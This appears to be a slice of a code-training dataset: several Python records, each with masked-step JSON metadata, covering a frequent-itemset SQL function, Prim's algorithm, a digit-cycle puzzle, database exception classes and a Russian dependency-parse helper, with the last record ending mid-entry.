yield tuple(['C'+str(i) for i in xrange(1, len(self.samplelist[0]) + 1)] )
for r in self.samplelist:
yield list(r)
if not ('.' in __name__):
"""
This is needed to be able to test the function, put it at the end of every
new function you create
"""
import sys
import setpath
from functions import *
testfunction()
if __name__ == "__main__":
reload(sys)
sys.setdefaultencoding('utf-8')
import doctest
doctest.testmod()
|
normal
|
{
"blob_id": "60411e922bfec8f98028f959a370f954eef5437e",
"index": 1329,
"step-1": "import re\nimport itertools\nimport setpath\nimport functions\nimport lib.jopts as jopts\nfrom operator import itemgetter\nimport random\n\n__docformat__ = 'reStructuredText en'\n\nre_params=re.compile('(\\w*):(.*)')\n\ndef consumer(func):\n \"\"\"A decorator, advances func to its first yield point when called.\n \"\"\"\n\n from functools import wraps\n\n @wraps(func)\n def wrapper(*args,**kw):\n gen = func(*args, **kw)\n gen.next()\n return gen\n return wrapper\n\n\nclass freqitemsets:\n \"\"\"\n .. function:: freqitemsets(datacol, [threshold, noautothres, stats, maxlen]) -> [itemset_id:int, itemset_length:int, itemset_frequency:int, item:text]\n\n Calculates frequent itemsets on a given column (datacol). The algorithm is tuned for the\n case when we have many different items (in the order of millions), many input itemsets, but\n small itemset length (10-20).\n\n Returned table schema:\n\n :itemset_id: Automatic itemset id\n :itemset_length: Length of itemset\n :itemset_frequency: How many times an itemset has been found\n :item: Itemset's item value\n\n Parameters:\n\n :datacol:\n\n Column on which to calculate frequent itemsets\n\n :threshold: Default is 2\n\n How many times an freq. itemset must appear for it to appear in the results\n\n :noautothres: 1/0 (Default is 0)\n\n Do not calculate the threshold automatically\n\n :stats: 1/0 (Default is 0)\n\n Return frequent itemset statistics\n\n :maxlen: NUMBER (Default is no limit at all)\n\n Maximum itemset length to search\n\n Examples:\n \n >>> table1('''\n ... 'car wood bike' 'first group'\n ... 'car car wood' 'first group'\n ... 'car wood' 'first group'\n ... 'car wood ice' 'first group'\n ... 'ice' 'second group'\n ... 'car ice' 'second group'\n ... 'car cream toy' 'second group'\n ... 'icecream ice car toy' 'second group'\n ... ''')\n >>> sql(\"select b,freqitemsets(a, 'threshold:2', 'noautothres:1', 'maxlen:2') from table1 group by b\")\n b | itemset_id | itemset_length | itemset_frequency | item\n ---------------------------------------------------------------------\n first group | 1 | 1 | 4 | wood\n first group | 2 | 1 | 4 | car\n first group | 3 | 2 | 4 | car\n first group | 3 | 2 | 4 | wood\n second group | 1 | 1 | 3 | ice\n second group | 2 | 1 | 3 | car\n second group | 3 | 1 | 2 | toy\n second group | 4 | 2 | 2 | car\n second group | 4 | 2 | 2 | ice\n second group | 5 | 2 | 2 | car\n second group | 5 | 2 | 2 | toy\n\n >>> sql(\"select b,freqitemsets(a, 'stats:1') from table1 group by b\")\n b | MaxTransactionLength | CombinationCount | PassedTransactions | ValidKeywords\n -------------------------------------------------------------------------------------------\n first group | 3 | 2 | 3 | 2\n first group | 3 | 1 | 1 | 2\n first group | 3 | 0 | 0 | 0\n second group | 4 | 3 | 3 | 3\n second group | 4 | 0 | 3 | 0\n \"\"\"\n\n\n registered=True\n multiset=True\n\n def __init__(self):\n self.threshold=2\n self.startingthreshold=2\n self.autothres=1\n self.compress=0\n self.initstatic=False\n self.input={}\n self.maxlength=0\n self.kwcode={}\n self.codekw={}\n self.maxkwcode=0\n self.overthres={}\n self.belowthres={}\n self.passedkw={}\n self.init=True\n self.itemset_id=0\n self.maxlen=None\n self.stats=False\n\n def initargs(self, args):\n self.init=False\n for i in xrange(1, len(args)):\n v=re_params.match(args[i])\n if v is not None and v.groups()[0]!='' and v.groups()[1]!='' and i>0:\n v=v.groups()\n if v[0]=='threshold':\n try:\n self.threshold=int(v[1])\n self.startingthreshold=self.threshold\n except KeyboardInterrupt:\n raise \n except:\n raise functions.OperatorError(\"FreqItemsets\",'No integer value given for threshold')\n if v[0]=='noautothres':\n self.autothres=0\n if v[0]=='compress':\n self.compress=1\n if v[0]=='maxlen':\n self.maxlen=int(v[1])\n if v[0]=='stats':\n self.stats=True\n\n def demultiplex(self, data):\n iterable=None\n iterpos=-1\n\n for i in xrange(len(data)):\n if hasattr(data[i],'__iter__')==True:\n iterable=data[i]\n iterpos=i\n break\n\n if iterpos==-1:\n yield list(data)\n else:\n pre=list(data[0:iterpos])\n post=list(data[iterpos+1:])\n for i in iterable:\n if hasattr(i,'__iter__')==False:\n yield pre+[i]+post\n else:\n yield pre+list(i)+post\n \n def insertcombfreq(self, comb, freq):\n if comb in self.overthres:\n self.overthres[comb]+=freq\n else:\n if comb in self.belowthres:\n self.belowthres[comb]+=freq\n else:\n self.belowthres[comb]=freq\n\n if self.belowthres[comb]>=self.threshold:\n self.overthres[comb]=self.belowthres[comb]\n del(self.belowthres[comb])\n for k in comb:\n if self.compress==0:\n self.passedkw[k]=True\n elif not k in self.passedkw:\n self.passedkw[k]=self.overthres[comb]\n else:\n self.passedkw[k]+=self.overthres[comb]\n\n def insertitemset(self, itemset):\n if itemset not in self.input:\n self.input[itemset]=1\n else:\n self.input[itemset]+=1\n\n def cleanitemsets(self, minlength):\n newitemsets={}\n for k,v in self.input.iteritems():\n itemset=tuple(i for i in k if i in self.passedkw)\n if self.compress==1:\n esoteric_itemset=tuple(i for i in itemset if self.passedkw[i]==v)\n if len(esoteric_itemset)>0:\n if len(itemset)>=minlength:\n self.overthres[itemset]=v\n itemset=tuple(i for i in itemset if self.passedkw[i]!=v)\n if len(itemset)>=minlength:\n if itemset not in newitemsets:\n newitemsets[itemset]=v\n else:\n newitemsets[itemset]+=v\n\n self.input=newitemsets\n\n def step(self, *args):\n if self.init==True:\n self.initargs(args)\n\n if len(args[0])==0:\n return\n \n itms=sorted(set(args[0].split(' ')))\n itms=[x for x in itms if x!='']\n li=len(itms)\n if li>0:\n if li>self.maxlength:\n self.maxlength=li\n\n inputkws=[]\n for kw in itms:\n if len(kw)==0:\n print itms, args[0], len(args[0]), li\n if kw not in self.kwcode:\n self.kwcode[kw]=self.maxkwcode\n self.codekw[self.maxkwcode]=kw\n inputkws.append(self.maxkwcode)\n self.insertcombfreq( (self.maxkwcode,),1 )\n self.maxkwcode+=1\n else:\n itm=self.kwcode[kw]\n self.insertcombfreq( (itm,),1 )\n inputkws.append(itm)\n\n if len(inputkws)>1:\n self.insertitemset(tuple(inputkws))\n\n def final(self):\n if not self.stats:\n yield ('itemset_id', 'itemset_length', 'itemset_frequency', 'item')\n else:\n yield ('MaxTransactionLength', 'CombinationCount', 'PassedTransactions', 'ValidKeywords')\n\n splist=[{},{}]\n del(self.kwcode)\n splist[1]=self.overthres\n\n if self.stats:\n yield [self.maxlength, len(splist[1]), len(self.input), len(self.passedkw)]\n\n if not self.stats:\n for its,v in sorted(splist[1].items(), key=itemgetter(1),reverse=True):\n self.itemset_id+=1\n for i in self.demultiplex( (self.itemset_id, len([self.codekw[i] for i in its]), v, [self.codekw[i] for i in its]) ):\n yield i\n\n if self.maxlen==None:\n self.maxlen=self.maxlength\n for l in xrange(2, min(self.maxlength+1, self.maxlen+1)):\n splist.append({})\n self.belowthres={}\n self.overthres={}\n prevl=l-1\n\n # Autothresholding\n if self.autothres==1:\n if len(self.input)==0 or len(self.passedkw)==0:\n break\n else:\n self.threshold=self.startingthreshold + int(len(self.passedkw)/len(self.input))\n\n self.cleanitemsets(l)\n self.passedkw={}\n prevsplist = splist[prevl]\n icombs = itertools.combinations\n insertcomb = self.insertcombfreq\n\n for k,v in self.input.iteritems():\n for k in icombs(k,l):\n insertit=True\n for i1 in icombs(k, prevl):\n if i1 not in prevsplist:\n insertit=False\n break\n\n if insertit:\n insertcomb( k,v )\n\n splist[l-1]={}\n splist[l]=self.overthres\n\n if self.stats:\n yield [self.maxlength, len(splist[l]), len(self.input), len(self.passedkw)]\n\n if not self.stats:\n for its,v in sorted(splist[l].items(), key=itemgetter(1),reverse=True):\n self.itemset_id+=1\n for i in self.demultiplex( (self.itemset_id, len([self.codekw[i] for i in its]), v, [self.codekw[i] for i in its]) ):\n yield i\n\n del(self.overthres)\n del(self.belowthres)\n del(self.passedkw)\n del(self.input)\n del(self.codekw)\n del(splist)\n\nclass sampledistvals:\n \"\"\"\n\n .. function:: sampledistvals(sample_size, C1, C2, C3) -> [C1, C2, C3]\n\n Sampledistvals returns sample_size distinct values for each of the input C1..Cn columns.\n\n >>> table1('''\n ... test1 2 3\n ... test1 2 3\n ... test2 4 2\n ... test4 2 t\n ... ''')\n >>> sql(\"select sampledistvals(3, a, b, c) from table1\")\n C1 | C2 | C3\n ---------------------------------------------\n [\"test1\",\"test2\",\"test4\"] | [2,4] | [2,3,\"t\"]\n \"\"\"\n registered=True\n\n def __init__(self):\n self.vals=None\n self.lenargs = -1\n self.init=True\n\n def step(self, *args):\n if self.init:\n self.lenargs = len(args)\n self.vals = a=[set() for i in xrange(self.lenargs-1)]\n self.init = False\n\n for i in xrange(1, self.lenargs):\n if len(self.vals[i-1])<args[0] and args[i] not in self.vals[i-1]:\n self.vals[i-1].add(args[i])\n\n def final(self):\n yield tuple(['C'+str(i) for i in xrange(1, self.lenargs)] )\n yield [jopts.toj(list(i)) for i in self.vals]\n\nclass sample:\n \"\"\"\n\n .. function:: sample(sample_size, C1, C2, C3)\n\n Sample returns a random sample_size set of rows.\n\n >>> table1('''\n ... test1 2 3\n ... test1 2 3\n ... test2 4 2\n ... test4 2 t\n ... ''')\n\n >>> sql(\"select sample(2, a, b, c) from table1\") # doctest: +ELLIPSIS\n C1 | C2 | C3\n ---------------\n ...\n \"\"\"\n registered=True\n\n def __init__(self):\n self.samplelist = []\n self.index = 0\n\n def step(self, *args):\n sample_count = args[0]\n\n # Generate the reservoir\n if self.index < sample_count:\n self.samplelist.append(args[1:])\n else:\n r = random.randint(0, self.index)\n if r < sample_count:\n self.samplelist[r] = args[1:]\n\n self.index += 1\n\n\n def final(self):\n if len(self.samplelist) == []:\n yield tuple(['C1'])\n else:\n yield tuple(['C'+str(i) for i in xrange(1, len(self.samplelist[0]) + 1)] )\n for r in self.samplelist:\n yield list(r)\n\nif not ('.' in __name__):\n \"\"\"\n This is needed to be able to test the function, put it at the end of every\n new function you create\n \"\"\"\n import sys\n import setpath\n from functions import *\n testfunction()\n if __name__ == \"__main__\":\n reload(sys)\n sys.setdefaultencoding('utf-8')\n import doctest\n doctest.testmod()\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
import sys
def ReadFile(array, fileName):
with open(fileName, 'r') as f:
if f.readline().rstrip() != 'MS':
print("prosze podac macierz sasiedztwa")
for i in f:
el = list(map(int, i.rstrip().split()))
if len(el) > 1:
array.append(el)
def Prim(matrix, vertex_to_start):
heap_map = [100000 for i in range(len(matrix))]
heap_map[vertex_to_start] = 0
length = len(matrix)
# tablica poprzednikow
p = [0 for i in range(len(matrix))]
# tablica gotowych wierzcholkow
ready_vertices = []
# obecny index na ktorym wykonywane sa operacje
index = vertex_to_start
while len(ready_vertices) != length:
for i in range(len(matrix[index])):
# sprawdzam czy wierzcholek juz nie jest gotowy i
# czy jest polaczenie miedzy wierzcholkami
if i not in ready_vertices and matrix[index][i] != 0:
# jezeli nowe polaczenie miedzy danym wierzcholkiem i
# jakas krawedzia lepsze(krotsze) to zamieniam poprzednika
if matrix[index][i] < heap_map[i]:
heap_map[i] = matrix[index][i]
p[i] = index
# dodaje wierzcholek do gotowych
ready_vertices.append(index)
# sztucznie usuwam z heap_map
heap_map[index] = 100000
# wybieram nowy indeks - minimalny
index = heap_map.index(min(heap_map))
# wierzcholek poczatkowy
p[vertex_to_start] = 'x'
print(p)
def main():
if len(sys.argv) < 2:
print("prosze podac plik")
sys.exit()
fileName = sys.argv[1]
matrix = []
ReadFile(matrix, fileName)
#print(matrix[1].index(min(matrix[0])))
Prim(matrix, 0)
if __name__ == "__main__":
main()
|
normal
|
{
"blob_id": "56b8b9884b8500ff70f59058484c4a351b709311",
"index": 3517,
"step-1": "<mask token>\n\n\ndef main():\n if len(sys.argv) < 2:\n print('prosze podac plik')\n sys.exit()\n fileName = sys.argv[1]\n matrix = []\n ReadFile(matrix, fileName)\n Prim(matrix, 0)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef ReadFile(array, fileName):\n with open(fileName, 'r') as f:\n if f.readline().rstrip() != 'MS':\n print('prosze podac macierz sasiedztwa')\n for i in f:\n el = list(map(int, i.rstrip().split()))\n if len(el) > 1:\n array.append(el)\n\n\ndef Prim(matrix, vertex_to_start):\n heap_map = [(100000) for i in range(len(matrix))]\n heap_map[vertex_to_start] = 0\n length = len(matrix)\n p = [(0) for i in range(len(matrix))]\n ready_vertices = []\n index = vertex_to_start\n while len(ready_vertices) != length:\n for i in range(len(matrix[index])):\n if i not in ready_vertices and matrix[index][i] != 0:\n if matrix[index][i] < heap_map[i]:\n heap_map[i] = matrix[index][i]\n p[i] = index\n ready_vertices.append(index)\n heap_map[index] = 100000\n index = heap_map.index(min(heap_map))\n p[vertex_to_start] = 'x'\n print(p)\n\n\ndef main():\n if len(sys.argv) < 2:\n print('prosze podac plik')\n sys.exit()\n fileName = sys.argv[1]\n matrix = []\n ReadFile(matrix, fileName)\n Prim(matrix, 0)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef ReadFile(array, fileName):\n with open(fileName, 'r') as f:\n if f.readline().rstrip() != 'MS':\n print('prosze podac macierz sasiedztwa')\n for i in f:\n el = list(map(int, i.rstrip().split()))\n if len(el) > 1:\n array.append(el)\n\n\ndef Prim(matrix, vertex_to_start):\n heap_map = [(100000) for i in range(len(matrix))]\n heap_map[vertex_to_start] = 0\n length = len(matrix)\n p = [(0) for i in range(len(matrix))]\n ready_vertices = []\n index = vertex_to_start\n while len(ready_vertices) != length:\n for i in range(len(matrix[index])):\n if i not in ready_vertices and matrix[index][i] != 0:\n if matrix[index][i] < heap_map[i]:\n heap_map[i] = matrix[index][i]\n p[i] = index\n ready_vertices.append(index)\n heap_map[index] = 100000\n index = heap_map.index(min(heap_map))\n p[vertex_to_start] = 'x'\n print(p)\n\n\ndef main():\n if len(sys.argv) < 2:\n print('prosze podac plik')\n sys.exit()\n fileName = sys.argv[1]\n matrix = []\n ReadFile(matrix, fileName)\n Prim(matrix, 0)\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "import sys\n\n\ndef ReadFile(array, fileName):\n with open(fileName, 'r') as f:\n if f.readline().rstrip() != 'MS':\n print('prosze podac macierz sasiedztwa')\n for i in f:\n el = list(map(int, i.rstrip().split()))\n if len(el) > 1:\n array.append(el)\n\n\ndef Prim(matrix, vertex_to_start):\n heap_map = [(100000) for i in range(len(matrix))]\n heap_map[vertex_to_start] = 0\n length = len(matrix)\n p = [(0) for i in range(len(matrix))]\n ready_vertices = []\n index = vertex_to_start\n while len(ready_vertices) != length:\n for i in range(len(matrix[index])):\n if i not in ready_vertices and matrix[index][i] != 0:\n if matrix[index][i] < heap_map[i]:\n heap_map[i] = matrix[index][i]\n p[i] = index\n ready_vertices.append(index)\n heap_map[index] = 100000\n index = heap_map.index(min(heap_map))\n p[vertex_to_start] = 'x'\n print(p)\n\n\ndef main():\n if len(sys.argv) < 2:\n print('prosze podac plik')\n sys.exit()\n fileName = sys.argv[1]\n matrix = []\n ReadFile(matrix, fileName)\n Prim(matrix, 0)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "import sys\n\ndef ReadFile(array, fileName):\n with open(fileName, 'r') as f:\n if f.readline().rstrip() != 'MS':\n print(\"prosze podac macierz sasiedztwa\")\n for i in f:\n el = list(map(int, i.rstrip().split()))\n if len(el) > 1:\n array.append(el)\n\n\ndef Prim(matrix, vertex_to_start):\n heap_map = [100000 for i in range(len(matrix))]\n heap_map[vertex_to_start] = 0\n\n length = len(matrix)\n\n # tablica poprzednikow\n p = [0 for i in range(len(matrix))]\n\n # tablica gotowych wierzcholkow\n ready_vertices = []\n\n # obecny index na ktorym wykonywane sa operacje\n index = vertex_to_start\n\n while len(ready_vertices) != length:\n for i in range(len(matrix[index])):\n # sprawdzam czy wierzcholek juz nie jest gotowy i\n # czy jest polaczenie miedzy wierzcholkami\n if i not in ready_vertices and matrix[index][i] != 0:\n # jezeli nowe polaczenie miedzy danym wierzcholkiem i\n # jakas krawedzia lepsze(krotsze) to zamieniam poprzednika\n if matrix[index][i] < heap_map[i]:\n heap_map[i] = matrix[index][i]\n p[i] = index\n # dodaje wierzcholek do gotowych\n ready_vertices.append(index)\n # sztucznie usuwam z heap_map\n heap_map[index] = 100000\n # wybieram nowy indeks - minimalny\n index = heap_map.index(min(heap_map))\n\n # wierzcholek poczatkowy\n p[vertex_to_start] = 'x' \n\n print(p)\n\n\n\n\ndef main():\n if len(sys.argv) < 2:\n print(\"prosze podac plik\")\n sys.exit()\n \n fileName = sys.argv[1]\n matrix = []\n \n ReadFile(matrix, fileName)\n\n #print(matrix[1].index(min(matrix[0])))\n Prim(matrix, 0)\n\n\n\n\nif __name__ == \"__main__\":\n main()",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
N = int(input())
StopPoint = N
cycle = 0
ten = 0
one = 0
new_N = 0
while True:
ten = N // 10
one = N % 10
total = ten + one
new_N = one * 10 + total % 10
cycle += 1
N = new_N
if new_N == StopPoint:
break
print(cycle)
|
normal
|
{
"blob_id": "047b3b25cb064115a46cde1f1480ce55a1256bc1",
"index": 5827,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwhile True:\n ten = N // 10\n one = N % 10\n total = ten + one\n new_N = one * 10 + total % 10\n cycle += 1\n N = new_N\n if new_N == StopPoint:\n break\nprint(cycle)\n",
"step-3": "N = int(input())\nStopPoint = N\ncycle = 0\nten = 0\none = 0\nnew_N = 0\nwhile True:\n ten = N // 10\n one = N % 10\n total = ten + one\n new_N = one * 10 + total % 10\n cycle += 1\n N = new_N\n if new_N == StopPoint:\n break\nprint(cycle)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
"""This module provides the definition of the exceptions that can be raised from the database module."""
class DatabaseError(Exception):
"""Raised when the requested database operation can not be completed."""
pass
class InvalidDictError(Exception):
"""Raised when the object can not be created from the provided dict."""
pass
|
normal
|
{
"blob_id": "94130b4962ecff2ea087ab34cf50a084254bf980",
"index": 8948,
"step-1": "<mask token>\n\n\nclass InvalidDictError(Exception):\n <mask token>\n pass\n",
"step-2": "<mask token>\n\n\nclass InvalidDictError(Exception):\n \"\"\"Raised when the object can not be created from the provided dict.\"\"\"\n pass\n",
"step-3": "<mask token>\n\n\nclass DatabaseError(Exception):\n <mask token>\n pass\n\n\nclass InvalidDictError(Exception):\n \"\"\"Raised when the object can not be created from the provided dict.\"\"\"\n pass\n",
"step-4": "<mask token>\n\n\nclass DatabaseError(Exception):\n \"\"\"Raised when the requested database operation can not be completed.\"\"\"\n pass\n\n\nclass InvalidDictError(Exception):\n \"\"\"Raised when the object can not be created from the provided dict.\"\"\"\n pass\n",
"step-5": "\"\"\"This module provides the definition of the exceptions that can be raised from the database module.\"\"\"\n\nclass DatabaseError(Exception):\n \"\"\"Raised when the requested database operation can not be completed.\"\"\"\n pass\n\nclass InvalidDictError(Exception):\n \"\"\"Raised when the object can not be created from the provided dict.\"\"\"\n pass",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
import itertools
import urllib
import word2vec
# MSD: http://corpus.leeds.ac.uk/mocky/ru-table.tab
# Universal: http://universaldependencies.org/ru/pos/index.html
def convert_pos_MSD_to_Universal(pos):
if pos.startswith('A'):
return 'ADJ'
elif pos.startswith('C'):
return 'CCONJ'
elif pos.startswith('I'):
return 'INTJ'
elif pos.startswith('M'):
return 'NUM'
elif pos.startswith('Nc'):
return 'NOUN'
elif pos.startswith('Np'):
return 'PROPN'
elif pos.startswith('N'):
return 'NOUN'
elif pos.startswith('P'):
return 'PRON' # TODO: or DET
elif pos.startswith('Q'):
return 'PART'
elif pos.startswith('R'):
return 'ADV'
elif pos.startswith('S'):
return 'ADP'
elif pos.startswith('V'):
return 'VERB' # TODO: or AUX
elif pos.startswith('SENT') or pos.startswith('PUNC'):
return 'PUNCT'
else:
return 'X'
# ------------------
# get_dep_tree(sentence)
# ---
# Creates a word dependency tree from a sentence.
# Returns: deptree=(node, [deptree])
# Creates a deptree from the webservice response dictionary
def make_dep_tree(respDict, idx):
if idx == 0:
el = None
else:
el = respDict[idx]
children = [(k, respDict[k]) for k in respDict if int(respDict[k][6]) == idx]
childTrees = [ make_dep_tree(respDict, k) for (k, c) in children ]
return (el, childTrees)
def get_dep_tree(sentence):
url = 'http://deptree.jental.name/parse?' + urllib.parse.urlencode({'text': sentence})
respRaw = urllib.request.urlopen(url)
resp = respRaw.read()
respStr = resp.decode('utf-8')
respList = [ r[1:-1].split('\\t') for r in respStr[1:-1].split(',') ]
respDict = dict([(int(r[0]), r + [convert_pos_MSD_to_Universal(r[5])]) for r in respList])
(root, trees) = make_dep_tree(respDict, 0)
if len(trees) == 0:
print('No tree', sentence, trees)
return None
else:
return trees[0]
# ------------------
# filter_dep_tree(tree)
# ---
# Filters out invaluable parts of speech.
# Returns: deptree=(node, [deptree])
def filter_dep_tree(tree):
root, children = tree
posp = convert_pos_MSD_to_Universal(root[3])
if (posp == 'ADJ' or posp == 'NUM' or posp == 'NOUN' or posp == 'PROPN' or posp == 'ADV' or posp == 'VERB'):
res = [ (root, list(itertools.chain.from_iterable([ filter_dep_tree(c) for c in children ]))) ]
else:
cd = [ filter_dep_tree(c) for c in children ]
if len(cd) > 0:
res = list(itertools.chain.from_iterable(cd))
else:
res = []
return res
# ------------------
# filter_dep_tree(tree)
# ---
# Prints a word dependency tree
def print_dep_tree(tree):
def pdt(t, offset):
root, children = t
print(''.join([ ' ' for i in range(0, offset) ]), root[1], root[3])
for c in children:
pdt(c, offset + 1)
pdt(tree, 0)
|
normal
|
{
"blob_id": "b2a2e06c5db8b12acbc852bafc4ea869b006c1c8",
"index": 9722,
"step-1": "<mask token>\n\n\ndef convert_pos_MSD_to_Universal(pos):\n if pos.startswith('A'):\n return 'ADJ'\n elif pos.startswith('C'):\n return 'CCONJ'\n elif pos.startswith('I'):\n return 'INTJ'\n elif pos.startswith('M'):\n return 'NUM'\n elif pos.startswith('Nc'):\n return 'NOUN'\n elif pos.startswith('Np'):\n return 'PROPN'\n elif pos.startswith('N'):\n return 'NOUN'\n elif pos.startswith('P'):\n return 'PRON'\n elif pos.startswith('Q'):\n return 'PART'\n elif pos.startswith('R'):\n return 'ADV'\n elif pos.startswith('S'):\n return 'ADP'\n elif pos.startswith('V'):\n return 'VERB'\n elif pos.startswith('SENT') or pos.startswith('PUNC'):\n return 'PUNCT'\n else:\n return 'X'\n\n\n<mask token>\n\n\ndef filter_dep_tree(tree):\n root, children = tree\n posp = convert_pos_MSD_to_Universal(root[3])\n if (posp == 'ADJ' or posp == 'NUM' or posp == 'NOUN' or posp == 'PROPN' or\n posp == 'ADV' or posp == 'VERB'):\n res = [(root, list(itertools.chain.from_iterable([filter_dep_tree(c\n ) for c in children])))]\n else:\n cd = [filter_dep_tree(c) for c in children]\n if len(cd) > 0:\n res = list(itertools.chain.from_iterable(cd))\n else:\n res = []\n return res\n\n\ndef print_dep_tree(tree):\n\n def pdt(t, offset):\n root, children = t\n print(''.join([' ' for i in range(0, offset)]), root[1], root[3])\n for c in children:\n pdt(c, offset + 1)\n pdt(tree, 0)\n",
"step-2": "<mask token>\n\n\ndef convert_pos_MSD_to_Universal(pos):\n if pos.startswith('A'):\n return 'ADJ'\n elif pos.startswith('C'):\n return 'CCONJ'\n elif pos.startswith('I'):\n return 'INTJ'\n elif pos.startswith('M'):\n return 'NUM'\n elif pos.startswith('Nc'):\n return 'NOUN'\n elif pos.startswith('Np'):\n return 'PROPN'\n elif pos.startswith('N'):\n return 'NOUN'\n elif pos.startswith('P'):\n return 'PRON'\n elif pos.startswith('Q'):\n return 'PART'\n elif pos.startswith('R'):\n return 'ADV'\n elif pos.startswith('S'):\n return 'ADP'\n elif pos.startswith('V'):\n return 'VERB'\n elif pos.startswith('SENT') or pos.startswith('PUNC'):\n return 'PUNCT'\n else:\n return 'X'\n\n\ndef make_dep_tree(respDict, idx):\n if idx == 0:\n el = None\n else:\n el = respDict[idx]\n children = [(k, respDict[k]) for k in respDict if int(respDict[k][6]) ==\n idx]\n childTrees = [make_dep_tree(respDict, k) for k, c in children]\n return el, childTrees\n\n\n<mask token>\n\n\ndef filter_dep_tree(tree):\n root, children = tree\n posp = convert_pos_MSD_to_Universal(root[3])\n if (posp == 'ADJ' or posp == 'NUM' or posp == 'NOUN' or posp == 'PROPN' or\n posp == 'ADV' or posp == 'VERB'):\n res = [(root, list(itertools.chain.from_iterable([filter_dep_tree(c\n ) for c in children])))]\n else:\n cd = [filter_dep_tree(c) for c in children]\n if len(cd) > 0:\n res = list(itertools.chain.from_iterable(cd))\n else:\n res = []\n return res\n\n\ndef print_dep_tree(tree):\n\n def pdt(t, offset):\n root, children = t\n print(''.join([' ' for i in range(0, offset)]), root[1], root[3])\n for c in children:\n pdt(c, offset + 1)\n pdt(tree, 0)\n",
"step-3": "<mask token>\n\n\ndef convert_pos_MSD_to_Universal(pos):\n if pos.startswith('A'):\n return 'ADJ'\n elif pos.startswith('C'):\n return 'CCONJ'\n elif pos.startswith('I'):\n return 'INTJ'\n elif pos.startswith('M'):\n return 'NUM'\n elif pos.startswith('Nc'):\n return 'NOUN'\n elif pos.startswith('Np'):\n return 'PROPN'\n elif pos.startswith('N'):\n return 'NOUN'\n elif pos.startswith('P'):\n return 'PRON'\n elif pos.startswith('Q'):\n return 'PART'\n elif pos.startswith('R'):\n return 'ADV'\n elif pos.startswith('S'):\n return 'ADP'\n elif pos.startswith('V'):\n return 'VERB'\n elif pos.startswith('SENT') or pos.startswith('PUNC'):\n return 'PUNCT'\n else:\n return 'X'\n\n\ndef make_dep_tree(respDict, idx):\n if idx == 0:\n el = None\n else:\n el = respDict[idx]\n children = [(k, respDict[k]) for k in respDict if int(respDict[k][6]) ==\n idx]\n childTrees = [make_dep_tree(respDict, k) for k, c in children]\n return el, childTrees\n\n\ndef get_dep_tree(sentence):\n url = 'http://deptree.jental.name/parse?' + urllib.parse.urlencode({\n 'text': sentence})\n respRaw = urllib.request.urlopen(url)\n resp = respRaw.read()\n respStr = resp.decode('utf-8')\n respList = [r[1:-1].split('\\\\t') for r in respStr[1:-1].split(',')]\n respDict = dict([(int(r[0]), r + [convert_pos_MSD_to_Universal(r[5])]) for\n r in respList])\n root, trees = make_dep_tree(respDict, 0)\n if len(trees) == 0:\n print('No tree', sentence, trees)\n return None\n else:\n return trees[0]\n\n\ndef filter_dep_tree(tree):\n root, children = tree\n posp = convert_pos_MSD_to_Universal(root[3])\n if (posp == 'ADJ' or posp == 'NUM' or posp == 'NOUN' or posp == 'PROPN' or\n posp == 'ADV' or posp == 'VERB'):\n res = [(root, list(itertools.chain.from_iterable([filter_dep_tree(c\n ) for c in children])))]\n else:\n cd = [filter_dep_tree(c) for c in children]\n if len(cd) > 0:\n res = list(itertools.chain.from_iterable(cd))\n else:\n res = []\n return res\n\n\ndef print_dep_tree(tree):\n\n def pdt(t, offset):\n root, children = t\n print(''.join([' ' for i in range(0, offset)]), root[1], root[3])\n for c in children:\n pdt(c, offset + 1)\n pdt(tree, 0)\n",
"step-4": "import itertools\nimport urllib\nimport word2vec\n\n\ndef convert_pos_MSD_to_Universal(pos):\n if pos.startswith('A'):\n return 'ADJ'\n elif pos.startswith('C'):\n return 'CCONJ'\n elif pos.startswith('I'):\n return 'INTJ'\n elif pos.startswith('M'):\n return 'NUM'\n elif pos.startswith('Nc'):\n return 'NOUN'\n elif pos.startswith('Np'):\n return 'PROPN'\n elif pos.startswith('N'):\n return 'NOUN'\n elif pos.startswith('P'):\n return 'PRON'\n elif pos.startswith('Q'):\n return 'PART'\n elif pos.startswith('R'):\n return 'ADV'\n elif pos.startswith('S'):\n return 'ADP'\n elif pos.startswith('V'):\n return 'VERB'\n elif pos.startswith('SENT') or pos.startswith('PUNC'):\n return 'PUNCT'\n else:\n return 'X'\n\n\ndef make_dep_tree(respDict, idx):\n if idx == 0:\n el = None\n else:\n el = respDict[idx]\n children = [(k, respDict[k]) for k in respDict if int(respDict[k][6]) ==\n idx]\n childTrees = [make_dep_tree(respDict, k) for k, c in children]\n return el, childTrees\n\n\ndef get_dep_tree(sentence):\n url = 'http://deptree.jental.name/parse?' + urllib.parse.urlencode({\n 'text': sentence})\n respRaw = urllib.request.urlopen(url)\n resp = respRaw.read()\n respStr = resp.decode('utf-8')\n respList = [r[1:-1].split('\\\\t') for r in respStr[1:-1].split(',')]\n respDict = dict([(int(r[0]), r + [convert_pos_MSD_to_Universal(r[5])]) for\n r in respList])\n root, trees = make_dep_tree(respDict, 0)\n if len(trees) == 0:\n print('No tree', sentence, trees)\n return None\n else:\n return trees[0]\n\n\ndef filter_dep_tree(tree):\n root, children = tree\n posp = convert_pos_MSD_to_Universal(root[3])\n if (posp == 'ADJ' or posp == 'NUM' or posp == 'NOUN' or posp == 'PROPN' or\n posp == 'ADV' or posp == 'VERB'):\n res = [(root, list(itertools.chain.from_iterable([filter_dep_tree(c\n ) for c in children])))]\n else:\n cd = [filter_dep_tree(c) for c in children]\n if len(cd) > 0:\n res = list(itertools.chain.from_iterable(cd))\n else:\n res = []\n return res\n\n\ndef print_dep_tree(tree):\n\n def pdt(t, offset):\n root, children = t\n print(''.join([' ' for i in range(0, offset)]), root[1], root[3])\n for c in children:\n pdt(c, offset + 1)\n pdt(tree, 0)\n",
